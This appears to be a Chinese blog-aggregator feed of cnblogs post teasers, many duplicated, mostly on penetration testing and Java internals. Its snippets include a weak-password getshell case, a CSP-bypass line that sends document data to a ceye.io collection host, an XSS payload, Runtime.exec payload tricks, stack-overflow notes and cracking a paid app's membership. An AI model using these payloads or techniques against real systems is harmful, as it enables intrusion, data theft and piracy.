实习时项目案例分享 - Afant1 案例是在最近项目中遇到的俩个站，挺有意思的，所以分享出来。第一个站getshell后，内网简单的看了下，发现不是目标就没深入。第一个站1、弱口令弱口令：admin admin进入网站后... 2020-05-03 15:07:00 | 阅读: 198 | 收藏 | www.cnblogs.com 注入 绕过 quagga

iframe绕过csp - Afant1 看csp规则，默认是在当前域内，允许执行内联js。如果这是一道ctf的话，就很简单了，window.location.href='http://aa.xxxx.ceye.io?'+document... 2020-5-3 14:8:0 | 阅读: 12 | 收藏 | www.cnblogs.com php n0 拦截 dcl

实习时项目案例分享 - Afant1 案例是在最近项目中遇到的俩个站，挺有意思的，所以分享出来。第一个站getshell后，内网简单的看了下，发现不是目标就没深入。第一个站1、弱口令弱口令：admin admin进入网站后台2、... 2020-5-3 14:7:0 | 阅读: 6 | 收藏 | www.cnblogs.com 注入 绕过 quagga 脚本

concurrent.futures进行并发编程 - 再见紫罗兰 - 博客园 Python中进行并发编程一般使用threading和multiprocessing模块，不过大部分的并发编程任务都是派生一系列线程，从队列中收集资源，然后用队列收集结果。在这些任务中，往往... 2020-05-02 12:20:28 | 阅读: 877 | 收藏 | www.cnblogs.com executor futures concurrent

关于某听书软件的开通20年会员的心路历程 - 大发写字的地方 - 博客园 设备：macOS 10.13.2   iPhone6 Plus 10.0.2（已越狱）    使用工具：MonkeyDev,class-dump,frida-ios-dump,usbmux... 2020-05-02 10:39:39 | 阅读: 522 | 收藏 | www.cnblogs.com monkeydev usbmuxd 2222 头文件 bundleid

TODO list - tr1ple 请输入博文的阅读密码: ... 2020-04-30 23:53:00 | 阅读: 60 | 收藏 | www.cnblogs.com 博文

Java ASM3学习(3) - tr1ple ClassVisitor的visitMethod能够访问到类中某个方法的一些入口信息，那么针对具体方法中字节码的访问是由MethodVisitor来进行的访问顺序如下，其中visitCo... 2020-04-30 23:43:00 | 阅读: 197 | 收藏 | www.cnblogs.com opcodes 指令 var2 visitmethod

Java ASM3学习(3) - tr1ple ClassVisitor的visitMethod能够访问到类中某个方法的一些入口信息，那么针对具体方法中字节码的访问是由MethodVisitor来进行的访问顺序如下，其中visitCode和v... 2020-4-30 22:43:0 | 阅读: 7 | 收藏 | www.cnblogs.com opcodes 指令 var2

Java ASM3学习(2) - tr1ple 1.编译后的方法区，其中存储的代码都是一些字节码指令2.Java虚拟机执行模型：java代码是在一个线程内部执行，每个线程都有自己的执行栈，栈由帧组成，每个帧表示一个方法的调用，每调用一... 2020-04-29 00:14:00 | 阅读: 148 | 收藏 | www.cnblogs.com 指令 testplus iload aload

Java ASM3学习(2) - tr1ple 1.编译后的方法区，其中存储的代码都是一些字节码指令2.Java虚拟机执行模型：java代码是在一个线程内部执行，每个线程都有自己的执行栈，栈由帧组成，每个帧表示一个方法的调用，每调用一个方法，... 2020-4-28 23:14:0 | 阅读: 7 | 收藏 | www.cnblogs.com 指令 testplus iload aload

Java Instrumentation插桩技术学习 - tr1ple openrasp中用到了Instrumentation技术，它的最大作用，就是类的动态改变和操作。使用Instrumentation实际上也可以可以开发一个代理来监视jvm的上运行的程序... 2020-04-28 11:22:00 | 阅读: 190 | 收藏 | www.cnblogs.com 虚拟 虚拟机 代理 security

Java Instrumentation插桩技术学习 - tr1ple openrasp中用到了Instrumentation技术，它的最大作用，就是类的动态改变和操作。使用Instrumentation实际上也可以可以开发一个代理来监视jvm的上运行的程序，可以动... 2020-4-28 10:22:0 | 阅读: 10 | 收藏 | www.cnblogs.com 虚拟 虚拟机 代理 security

Java ASM3学习(1) - tr1ple ASM也是字节码编辑库，如果我们的目的仅仅是为目标类添加某些功能，也可以考虑动态代理，但是动态代理是面向接口的，因为proxy.newinstance实际上是对某个接口定义一个invocaionHa... 2020-04-23 19:16:00 | 阅读: 22 | 收藏 | www.cnblogs.com classreader classwriter eat objectweb

Java ASM3学习(1) - tr1ple ASM也是字节码编辑库，如果我们的目的仅仅是为目标类添加某些功能，也可以考虑动态代理，但是动态代理是面向接口的，因为proxy.newinstance实际上是对某个接口定义一个invocaionHa... 2020-4-23 18:16:0 | 阅读: 7 | 收藏 | www.cnblogs.com classreader classwriter eat objectweb

java.lang.Runtime.exec() Payload Workarounds - 羊小弟 来源:http://www.jackson-t.ca/runtime-exec-payloads.html扣一下html代码，保存在本地方便查找，也方便增加。<!DOCTYPE html><... 2020-4-21 15:53:0 | 阅读: 6 | 收藏 | 博客园 - 羊小弟 - www.cnblogs.com tainput python taoutput powershell perl

绕过XSS过滤姿势总结 - zha0gongz1 0x00 XSS基本测试流程原则是“见框就插”，多动手，这里分享几个经典测试payload："><svg/onload=alert(1)//具体引用外部js的代码姿势是:<svg/onlo... 2020-4-19 17:14:0 | 阅读: 28 | 收藏 | 博客园 - zha0gongz1 - www.cnblogs.com onfocus 绕过 cript javas payload

栈溢出笔记-第六天 - Afant1 当时不明白为什么要padding 8个a原因：IDA查看当前的rsp是0x38-0x30=0x8，原因看上面在vul函数ret地方下断点，rbp=0x1,r12=write_g... 2020-04-17 19:14:00 | 阅读: 129 | 收藏 | www.cnblogs.com wiki retaddr 往后 6643 长亭

栈溢出笔记-第六天 - Afant1 当时不明白为什么要padding 8个a原因：IDA查看当前的rsp是0x38-0x30=0x8，原因看上面在vul函数ret地方下断点，rbp=0x1,r12=write_got地址... 2020-4-17 18:14:0 | 阅读: 12 | 收藏 | www.cnblogs.com wiki retaddr 6643 payload vuln

绕过CDN查找真实 IP 姿势总结 - zha0gongz1 返回域名解析对应多个 IP 地址，网站可能部署CDN业务，我们就需要bypass CDN，去查找真正的服务器ip地址0x01.域名搜集由于成本问题，可能某些厂商并不会将所有的子域名都部署 CD... 2020-4-15 21:41:0 | 阅读: 13 | 收藏 | 博客园 - zha0gongz1 - www.cnblogs.com 证书 github 偏远 bypass

从JDK源码学习HashSet和HashTable - tr1ple Java中的集合（Collection）有三类，一类是List，一类是Queue，再有一类就是Set。 前两个集合内的元素是有序的，元素可以重复；最后一个集合内的元素无序，但元素不可重复。Set... 2020-4-15 00:34:0 | 阅读: 6 | 收藏 | www.cnblogs.com hashtable hashcode hashset 键值 次方